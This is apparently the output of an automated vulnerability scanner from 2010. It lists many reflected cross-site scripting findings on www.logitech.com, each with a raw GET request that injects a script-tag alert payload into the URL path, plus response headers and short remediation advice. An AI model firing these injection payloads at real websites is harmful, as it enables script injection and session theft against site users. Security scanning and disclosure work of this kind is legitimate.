GET /bb32a</script><script>alert(1)</script>7ade0831ab8/32564/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d42c"><script>alert(1)</script>58dfc3ea3b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /6d42c"><script>alert(1)</script>58dfc3ea3b1/32564/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c807b"><script>alert(1)</script>5ec5abf305e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /c807b"><script>alert(1)</script>5ec5abf305e/33033/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48b13</script><script>alert(1)</script>df733b2b0ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /48b13</script><script>alert(1)</script>df733b2b0ec/33033/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c06c</script><script>alert(1)</script>0c7d00fb515 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /3c06c</script><script>alert(1)</script>0c7d00fb515/33048/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bb29"><script>alert(1)</script>1d38559caff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /7bb29"><script>alert(1)</script>1d38559caff/33048/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7137"><script>alert(1)</script>a11adaf5bed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /c7137"><script>alert(1)</script>a11adaf5bed/33048/2/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2207</script><script>alert(1)</script>faa6bb4caa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c2207</script><script>alert(1)</script>faa6bb4caa8/33048/2/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86983"><script>alert(1)</script>29194f686f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /86983"><script>alert(1)</script>29194f686f8/33897/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7e93</script><script>alert(1)</script>a23b9d258c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /d7e93</script><script>alert(1)</script>a23b9d258c7/33897/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fcfb</script><script>alert(1)</script>eb04cae4f34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2fcfb</script><script>alert(1)</script>eb04cae4f34/33900/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb57a"><script>alert(1)</script>cd222b0b38d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /eb57a"><script>alert(1)</script>cd222b0b38d/33900/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33fb8"><script>alert(1)</script>4e64bd8aed4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /33fb8"><script>alert(1)</script>4e64bd8aed4/33903/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c7a0</script><script>alert(1)</script>898a08fcb2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /4c7a0</script><script>alert(1)</script>898a08fcb2c/33903/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f88bd</script><script>alert(1)</script>05edf719c3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /f88bd</script><script>alert(1)</script>05edf719c3b/34007/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a148"><script>alert(1)</script>c5b1e6f43aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /8a148"><script>alert(1)</script>c5b1e6f43aa/34007/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 992ec"><script>alert(1)</script>616f8778c55 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /992ec"><script>alert(1)</script>616f8778c55/34067/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33442</script><script>alert(1)</script>4d901d526b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /33442</script><script>alert(1)</script>4d901d526b7/34067/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6376</script><script>alert(1)</script>c9d20560f5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a6376</script><script>alert(1)</script>c9d20560f5f/5848/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7812"><script>alert(1)</script>98a80d4228f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /c7812"><script>alert(1)</script>98a80d4228f/5848/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15419</script><script>alert(1)</script>1c4abb09d95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /15419</script><script>alert(1)</script>1c4abb09d95/6277/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb066"><script>alert(1)</script>73c2f22eb06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /eb066"><script>alert(1)</script>73c2f22eb06/6277/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cfa4</script><script>alert(1)</script>bc7c7e40a0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /4cfa4</script><script>alert(1)</script>bc7c7e40a0e/7167/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 806c7"><script>alert(1)</script>c1d6c0950cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /806c7"><script>alert(1)</script>c1d6c0950cc/7167/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14c82"><script>alert(1)</script>9d1a97b66bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /14c82"><script>alert(1)</script>9d1a97b66bc/9653/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 777b6</script><script>alert(1)</script>190bc790f22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /777b6</script><script>alert(1)</script>190bc790f22/9653/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
